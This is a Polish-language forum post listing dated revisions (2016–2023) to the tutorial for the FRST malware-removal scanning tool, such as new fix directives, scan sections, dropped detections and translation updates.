06/16/2016 W opisie "90 Days Files" uwzględnione, że skan dotyczy też zmodyfikowanych plików i folderów
06/18/2016 Dodane czyszczenie cache ikon Windows Explorer do listy EmptyTemp:
07/05/2016 Zaktualizowany opis dyrektywy Powershell:
07/22/2016 Dodane dyrektywy StartBatch: — EndBatch: i StartPowershell: — EndPowershell:
07/22/2016 Poprawione opisy dyrektyw SetDefaultFilePermissions: i Unlock:
07/22/2016 Nazwa raportu wynikowego "Search Registry" zmieniona na SearchReg.txt
07/25/2016 Dodane dyrektywy StartRegedit: — EndRegedit:
07/25/2016 Zaktualizowany opis dyrektywy Reg:
08/15/2016 Sekcja Edge rozszerzona o skan rozszerzeń
09/22/2016 Opis MSCONFIG/TASK MANAGER disabled items zaktualizowany o instrukcje usuwania oraz nowe przykłady
10/13/2016 Stara detekcja modyfikacji ZeroAccess ("File name is altered") usunięta z sekcji Registry
10/13/2016 Opis ograniczeń w sekcji Registry rozszerzony o ograniczenia SAFER, skrypty GPO i zaktualizowaną detekcję Registry.pol
10/13/2016 Zaktualizowany opis Firefox w celu odbicia przebudowanego skanu adresującego wszystkie profile (włączając klony Firefox)
10/13/2016 W opisie Chrome dodane flagowanie profilów i przetwarzanie preferencji
10/13/2016 Pole Addition.txt jest teraz zawsze zaznaczone
10/13/2016 Dodana dyrektywa TasksDetails:
12/09/2016 Dodana naprawa usługi Themes (Kompozycje) do listy wyjątków w opisie Services
12/09/2016 Kopia zapasowa rejestru starsza niż dwa miesiące zostanie nadpisana
12/09/2016 Opis dyrektywy Zip: zaktualizowany by odbić zmieniony system nazewnictwa plików ZIP
01/18/2017 W sekcji Registry dodana informacja o zablokowanych kluczach zaplanowanych do usunięcia przy restarcie
01/24/2017 Usunięty link do niemieckiej wersji tutoriala
02/01/2017 Podmieniony link do francuskiej wersji tutoriala
02/13/2017 Opis Unicode przeniesiony z sekcji FRST.txt do Wprowadzenia i zaktualizowany o nowe przykłady
02/13/2017 Instrukcje czyszczenia wpisów wtyczek typu "No file" usunięte z opisu Chrome (kontrola wtyczek nie jest dostępna w Chrome 56+)
02/13/2017 Zaktualizowane różne przykłady i poprawione linki
02/19/2017 Dodana dyrektywa ExportKey:
02/23/2017 Dodana dyrektywa ExportValue:
03/05/2017 Dodana dyrektywa DeleteValue:
03/05/2017 Dyrektywa DeleteKey: jest już obsługiwana w trybie Recovery
05/05/2017 Dodany skrót Ctrl+y automatycznie generujący pusty fixlist.txt
05/05/2017 Opis Chrome zaktualizowany o instrukcje poprawnego obchodzenia się z przekierowaniami Nowej karty oraz rozszerzeniami
05/05/2017 Różne mniejsze zmiany
05/06/2017 Dodane tworzenie skryptu naprawy za pośrednictwem schowka systemowego
05/06/2017 Uaktualnione tzw. "wklejki" (Canned Speeches) -> nie dotyczy polskiej wersji tutoriala
06/05/2017 Dodana detekcja Niezaufanych certyfikatów w sekcji Registry
06/07/2017 Dodana dyrektywa CreateDummy:
06/07/2017 W opisie Firefox dodane flagowanie profilów
06/14/2017 Etykieta "Shortcuts" przemianowana na "Shortcuts & WMI" w Addition.txt
06/14/2017 Uściślone wyjaśnienia tyczące rozszerzeń Chrome na poziomie rejestru
07/04/2017 Niemiecki tutorial zaktualizowany i ponownie dodany do oficjalnej listy tłumaczeń
07/04/2017 Rozszerzony skan Custom CLSID
07/04/2017 Dodane ustawienia SmartScreen w sekcji Other Areas
07/04/2017 Zaktualizowany opis Internet Explorer
07/04/2017 Różne uproszczenia i mniejsze zmiany
07/08/2017 Linie CHR Extension nie są już przetwarzane w skrypcie naprawy
08/19/2017 Zaktualizowany ustęp "Informacja o tutorialu"
08/19/2017 Dodana dyrektywa VirusTotal:
08/19/2017 Dyrektywa File: zaktualizowana o sprawdzanie VirusTotal
08/19/2017 Uściślone zachowanie dyrektywy Folder: w kontekście rekursywności
08/19/2017 W opisie Accounts dodana informacja, że konta Microsoftu nie są wykrywane
10/05/2017 Dodana adnotacja na temat limitu czasowego naprawy
10/05/2017 W sekcji Bamital & volsnap dodana detekcja zablokowanych/zerobajtowych sterowników oraz wyłączonego trybu Recovery
10/05/2017 Dodana dyrektywa FilesInDirectory:
10/05/2017 Opisy dyrektyw File: i Folder: rozdzielone oraz zaktualizowane
10/10/2017 Dodane funkcje FindFolder: i SearchAll: do przycisku "Search Files"
10/10/2017 Zaktualizowany opis dyrektywy FindFolder:
10/21/2017 Zaktualizowane przykładowe nagłówki FRST.txt i Addition.txt pokazujące kompilację Windows 10
10/24/2017 W opisie Fixing dodane objaśnienie słowa kluczowego "CurrentUserName"
11/27/2017 Rozdzielone opisy przygotowywania skryptu via Fixlist.txt i Ctrl+y
01/17/2018 Uproszczona detekcja zablokowanych sterowników w sekcji Bamital & volsnap
02/17/2018 Dodana dyrektywa Copy:
02/17/2018 Dodany dziennik zdarzeń Windows Defender
02/17/2018 Opis Drives - MBR & Partition Table zaktualizowany z uwzględnieniem niepodmontowanych woluminów i układów UEFI\GPT
02/20/2018 Detekcje TDL4 usunięte z sekcji Bamital & volsnap oraz Drives
02/25/2018 Detekcje ZeroAccess usunięte z opisów Winsock, NetSvcs, One Month
02/25/2018 Podmieniony opis przetwarzania linków symbolicznych w sekcji One Month
02/25/2018 Usunięta dyrektywa nointegritychecks on: (brak obsługi)
02/25/2018 Opis testsigning on: podmieniony ogólną i uproszczoną wersją
02/25/2018 Usunięta detekcja "Chrome dev build detected!"
02/25/2018 Usunięte stare przykłady z opisów Firefox i Chrome
02/25/2018 Opis SmartScreen skorygowany pod kątem Windows 10 Wersja 1703 i nowszych
02/25/2018 Różne mniejsze zmiany
03/11/2018 Usunięta informacja o wsparciu via dotacje
05/03/2018 Dodany opis deinstalacji FRST
05/17/2018 Dodany skan ograniczeń Firefox
05/17/2018 Uściślone objaśnienia tyczące skanu zainstalowanych programów
12/10/2018 Dodane holenderskie tłumaczenie
12/10/2018 Uściślone kodowanie UTF-8 dla ręcznie tworzonego pliku fixlist.txt
12/10/2018 Dodane objaśnienie komunikatów ATTENTION / UWAGA relatywnych do automatycznego odblokowania usług i zadań
12/10/2018 Podmieniony opis skanu WMI
12/10/2018 Dodany skan Telephony Service Providers (TSP) w sekcji Other Areas
01/13/2019 Opis w sekcji Rejestr zaktualizowany i uproszczony
01/13/2019 W opisie "Hosts content" dodana adnotacja o pliku hosts.ics
01/13/2019 Dodany skan zmiennej Path w sekcji Inne obszary
01/13/2019 Zaktualizowane niektóre etykiety w FRST.txt
01/18/2019 Wersja Internet Explorer usunięta z nagłówka FRST.txt na Windows 8 i nowszych
04/27/2019 Producent i model systemu dodane do nagłówka FRST.txt
04/27/2019 BIOS i Płyta główna dodane do skanu Informacje o pamięci w Addition.txt
04/27/2019 Zaktualizowane opisy filtrowania, Domyślne obszary skanowania, Usługi/Sterowniki i Załadowane moduły, by odbić rozszerzoną weryfikację podpisów cyfrowych
04/27/2019 Dodana sekcja "FCheck". Usunięte sekcje "Pliki do przeniesienia lub usunięcia", "Niektóre zerobajtowe pliki/foldery", "Niektóre pliki w TEMP".
04/27/2019 Sekcja Bamital & volsnap przemianowana na "SigCheck". Powiązany opis dostosowany.
04/27/2019 Zaplanowane zadania przeniesione do FRST.txt (wsparcie z poziomu RE)
04/27/2019 Zaktualizowany opis Niestandardowe rejestracje CLSID, by uwzględnić skany przeniesione z FRST.txt
04/27/2019 Opis wyłączonego Przywracania systemu usunięty z sekcji Rejestr na korzyść krótkiej notatki w opisie Addition.txt
04/27/2019 Objaśniona różnica pomiędzy serwerami DNS wyliczanymi w FRST.txt i Addition.txt
04/27/2019 Dodana notatka relatywna do adresu aktualizacji rozszerzeń
04/27/2019 Wiele przykładów zaktualizowanych lub podmienionych
04/27/2019 Różne mniejsze zmiany
05/13/2019 Zaktualizowany opis Zainstalowane programy, by uwzględnić pakiety Windows 10/8
06/07/2019 Dodane objaśnienie pakietów z wbudowanymi reklamami. Opis ukrytych programów uproszczony.
06/07/2019 Dodany skan SigCheckExt
06/07/2019 Usunięty skan MD5 sterowników
06/07/2019 Usunięta dyrektywa VerifySignature:
06/07/2019 Do opisów File: i VirusTotal: dodana notatka adresująca większą ilość plików niż 4
06/07/2019 Usunięta automatyczna naprawa usługi Winmgmt
06/07/2019 Skorygowane informacje związane z podpisami cyfrowymi wejść NetSvcs
06/07/2019 Opisy Zasad grupy usunięte z sekcji Firefox i Chrome
06/10/2019 Dodany skan FLock
06/10/2019 Usunięty opis zablokowanych sterowników zlokalizowany pod sekcją SigCheck
06/20/2019 Zaktualizowany komunikat wynikowy StartRegedit: — EndRegedit:
07/31/2019 Wszystkie wystąpienia Restore From Backup: podmienione przez RestoreFromBackup:
07/31/2019 Usunięta dyrektywa RestoreErunt:
07/31/2019 Dodana dyrektywa SystemRestore:
07/31/2019 Zaktualizowane opisy Punkty przywracania systemu
08/25/2019 Dodane słowo kluczowe "AllUserName"
11/08/2019 Dodane hiszpańskie tłumaczenie
11/08/2019 Zaktualizowane opisy Firefox, Chrome i Opera
11/08/2019 Linie OPR Extension nie są już przetwarzane w skrypcie naprawy
11/08/2019 W opisie zainstalowanych pakietów dodana detekcja [Startup Task]
10/20/2019 Uaktualniony opis EmptyTemp: w celu zaadresowania Historii Firefox
25/01/2020 Opis Edge zastąpiony nowym adresującym wersję opartą na Chromium
25/01/2020 Zaktualizowana notatka związana z repozytoriami rozszerzeń, by uwzględnić Microsoft Edge Addons
25/01/2020 Zaktualizowany opis Chrome, by zaadresować, że teraz preferencje są wykrywane we wszystkich profilach
25/01/2020 Dodany skan Network Binding w sekcji Inne obszary
26/01/2020 Rosyjskie tłumaczenie oznaczone jako nieaktualizowane
16/05/2020 Odnośniki do "Available profiles" / "Dostępne profile" usunięte z opisu nagłówka FRST.txt
16/05/2020 Opis sekcji "Procesy" zaktualizowany o objaśnienie <numeru>
16/05/2020 Różne mniejsze zmiany
13/09/2020 Sekcje "Internet Explorer" i "Internet Explorer - Witryny zaufane i z ograniczeniami" scalone w Addition.txt
13/09/2020 Wersja Internet Explorer przeniesiona z nagłówka FRST.txt do tytułu sekcji "Internet Explorer"
15/10/2020 Przeglądarka Edge dodana do detekcji w Registry.pol
22/11/2020 Zaktualizowany zrzut ekranu konsoli w celu pokazania nowej opcji "Jeden miesiąc" w sekcji Filtrowanie
22/11/2020 Opisy filtrowania zaktualizowane bądź usunięte w różnych sekcjach
22/11/2020 Zaktualizowana notatka dotycząca weryfikacji podpisów cyfrowych w sekcji "Jeden miesiąc"
22/11/2020 Różne mniejsze zmiany


 
[Obecnie odpowiadam także za aktualizacje angielskiej wersji tutoriala FRST. Wcześniej moja rola była ograniczona do sugerowania zmian. Moje aktualizacje zaczynają się od dnia 04/20/2016.]

 

Edytowane przez picasso
Odnośnik do komentarza
  • 6 lat później...

Lista zmian 2021

Rewizje tutorialu:
14/01/2021 Zaktualizowane rosyjskie tłumaczenie
24/01/2021 Brave, Vivaldi i Yandex Browser dodane do Skanu/Naprawy i EmptyTemp:
17/02/2021 Zaktualizowany opis "Załadowane profile"
04/07/2021 Zaktualizowany opis "Konta użytkowników"
23/09/2021 Plik qmgr.db dodany do EmptyTemp: 
12/11/2021 Dodane Portugalskie tłumaczenie
12/11/2021 Dodany Windows 11 do listy obsługiwanych systemów operacyjnych
12/11/2021 Dodany skan BITS w sekcji Inne obszary
12/11/2021 Drobne dostosowania danych w nagłówku FRST.txt
12/11/2021 Korekta różnych linków
12/11/2021 Zaktualizowania składnia angielskiej wersji "Canned Speeches" (nie dotyczy polskiej wersji)

Edytowane przez picasso
Odnośnik do komentarza
  • 10 miesięcy temu...

Lista zmian 2022

Rewizje tutorialu:
06/02/2022 Dodana dyrektywa Comment:
23/03/2022 Limit czasu Naprawy ograniczony do dyrektywy cmd:
28/03/2022 Opis sekcji "Procesy" zaktualizowany o objaśnienie (procesu nadrzędnego ->)
26/06/2022 Dodany model dysku dla twardych dysków
26/06/2022 Zaktualizowana dyrektywa EmptyTemp: (usunięte cache Flash, dodane cache Discord)
26/06/2022 Dodana dyrektywa EmptyEventLogs:
26/06/2022 Dyrektywy FilesInDirectory: i Folder: zaktualizowane o weryfikację podpisów cyfrowych
26/06/2022 Usunięte zbędne przykłady
07/10/2022 Dodany limit czasu naprawy dla dyrektywy Powershell:
07/10/2022 Cache WinHTTP AutoProxy dodane do EmptyTemp:

Edytowane przez picasso
Odnośnik do komentarza
  • 1 rok później...

Lista zmian 2023

Rewizje tutorialu:

03/09/2023 Zaktualizowany zrzut ekranu w celu pokazania nowej opcji "Zaplanowane zadania" w sekcji Filtrowanie
03/09/2023 Do nagłówka dodany docelowy plik wykonywalny FRST
03/09/2023 Dodana dyrektywa Symlink:
03/09/2023 Dodane czyszczenie pamięci podręcznej DNS do dyrektywy EmptyTemp:
03/09/2023 Korekta różnych linków
13/12/2023 W sekcji Rejestru dodane przekierowania folderów Startup
13/12/2023 Opis dyrektywy Unlock: skorygowany i odchudzony
13/12/2023 Korekta notatki dotyczącej uszkodzonej zmiennej Path

Edytowane przez picasso
Odnośnik do komentarza
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...